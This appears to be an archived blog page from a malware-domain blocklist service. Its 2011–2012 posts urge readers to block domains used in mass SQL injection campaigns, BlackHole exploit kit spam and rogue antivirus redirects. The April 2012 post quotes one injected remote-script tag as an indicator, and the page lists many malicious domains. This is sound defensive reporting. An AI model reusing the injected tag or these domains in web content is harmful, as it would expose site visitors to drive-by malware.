sqli: Block Njukol -dot – com

Posted on April 29th, 2012 in 0day,iframes,New Domains,sql injection by dglosser

We received a report that there’s  a sqli injection going on with  njukol . com/ r.php.  Please check your web sites and add this to your block or shun list.      Original Source: http://ilion.blog47.fc2.com/

Urgent Block: nikjju.com and best-antiviruu.de.lv

Posted on April 17th, 2012 in 0day,iframes,rogue antivirus,sql injection by dglosser

Sucuri  is reporting a new Mass SQL Injection campaign.  Sites are infected with the following javascript:

<script src= http://nikjju . com/r.php ></script>

which redirects to Fake/Rogue AV sites such as best-antiviruu. de. lv

Please add these sites to your blocklists and sinkholes ASAP.

Urgent Block: ionis90landsi -dot- rr -dot- nu — Mass Injection of WordPress Websites

Posted on March 6th, 2012 in 0day,sql injection by dglosser

Websense has posted an article relating to mass SQL  injection into wordpress sites.  The domain is  ionis90landsi.  rr.   nu     (spaces added)

This link seems to have a larger list  of domains to block…

Urgent Block: BlackHole Exploit Kit redret Spam Domains

Posted on December 6th, 2011 in 0day,Domain News,malspam by dglosser

From the Internet Storm Center, please block the following domains:

  • czredret . ru
  • curedret . ru
  • ctredret . ru
  • crredret . ru
  • bzredret . ru
  • byredret . ru
  • bxredret . ru
  • bwredret . ru
  • bvredret . ru
  • bsredret . ru
  • bpredret . ru
  • boredret . ru
  • blredret . ru
  • bkredret . ru
  • biredret . ru
  • bhredret . ru
  • bgredret . ru
  • bfredret . ru,
  • beredret . ru
  • bdredret . ru
  • bcredret . ru
  • bbredret . ru
  • aredret . ru
  • apredret . ru
  • amredret . ru
  • alredret . ru
  • akredret . ru
  • ajredret . ru
  • airedret . ru
  • ahredret . ru
  • agredret . ru
  • afredret . ru
  • aeredret . ru
  • adredret . ru
  • acredret . ru
  • abredret . ru
  • aaredret . ru

and be on the lookout for more domains containing the string “redret” (hmmm I wonder if adbblock or mywot can handle regex..).

IP addresses to block are also in the article.  Also see this article.  Will be added here but you shouldn’t wait.

iframe,sqli,cybercriminal domains

Posted on December 3rd, 2011 in 0day,iframes,New Domains,Spyeye,Trojans,zeus by dglosser

A small but important update containing domains associated with iframes, cybercriminals, zeus, and our friend lilupophilupop . com.   Sources include malc0de.com, safebrowsing.google.com, www.spamhaus.org (Every source is  listed in the domains.txt file)…

Reminder: the mirror for compressed zip files is up and running – please contact us for details – right now it has very little usage.

Please help to keep this site free and donate whatever you can:  All donations go to hosting and infrastructure costs.

These malware block lists provided here are for free for noncommercial use as part of the fight against malware.   Any use of this list commercially is strictly prohibited without prior approval.

Please use the “datestamp” and “timestamp” file to determine if the list has been updated and ONLY pull the files you need – abusers will be banned!

Yearly sponsorships are available. Full acknowledgment, an icon, and link back to your site will be placed in the left sidebar.

Domains.txt file is the complete list along with original reference.
Justdomains contains list of only the domain names.

BOOT file is in MS DNS format. spywaredomains.zones file is in BIND format.

Also Available in AdBlock, ISA, and MaraDNS formats.

A trusted source on the WOT-the Web of Trust . Used by SURBL, MOREnet, SANs, and others…

Urgent Block: lilupophilupop-dot-com (SQL Injection)

Posted on December 2nd, 2011 in 0day,sql injection by dglosser

SANs is reporting that there’s a SQLi campaign going on right now with the malicious domain lilupophilupop .com being injected into sites running MSSQL.

We will block that domain on the next update but you shouldn’t wait….

Source: http://isc.sans.edu/diary.html?storyid=12127#comment

Steve Jobs Malspam

Posted on October 12th, 2011 in 0day by dglosser

Guess it was inevitable…  Steve jobs spam leading to malicious exploits.  As the list of exploit domains is still evolving, see the following for more information:



willysy .com Mass Injection

Posted on July 26th, 2011 in 0day,Domain News,exploit by dglosser

Armorize reports on a mass injection of, 90,000 infected pages. The injected iframe points to willysy .com.

We’ll be adding those domains on tonight’s update, but please read the article and take immediate action if you can.

Flash Exploits on the Loose

Posted on June 17th, 2011 in 0day,Domain News by dglosser

Shadowserver has a great write-up called Flash Exploits on the Loose: Update Now: It is Critical You Update Your Adobe Flash Player.  Several domains containing mailicious payloads are listed.

We’ll be adding these domain on the next update, but you should add the domains and IP addresses to your domain and ip blocklist ASAP.

Urgent Block: xwhoisdns [dot] com

Posted on May 20th, 2011 in 0day,New Domains by dglosser

xwhoisdns . com will be added to tonight’s blocklist, but you may wish to add to your blocklist ASAP.

ThreatExpert has more details on this  guy.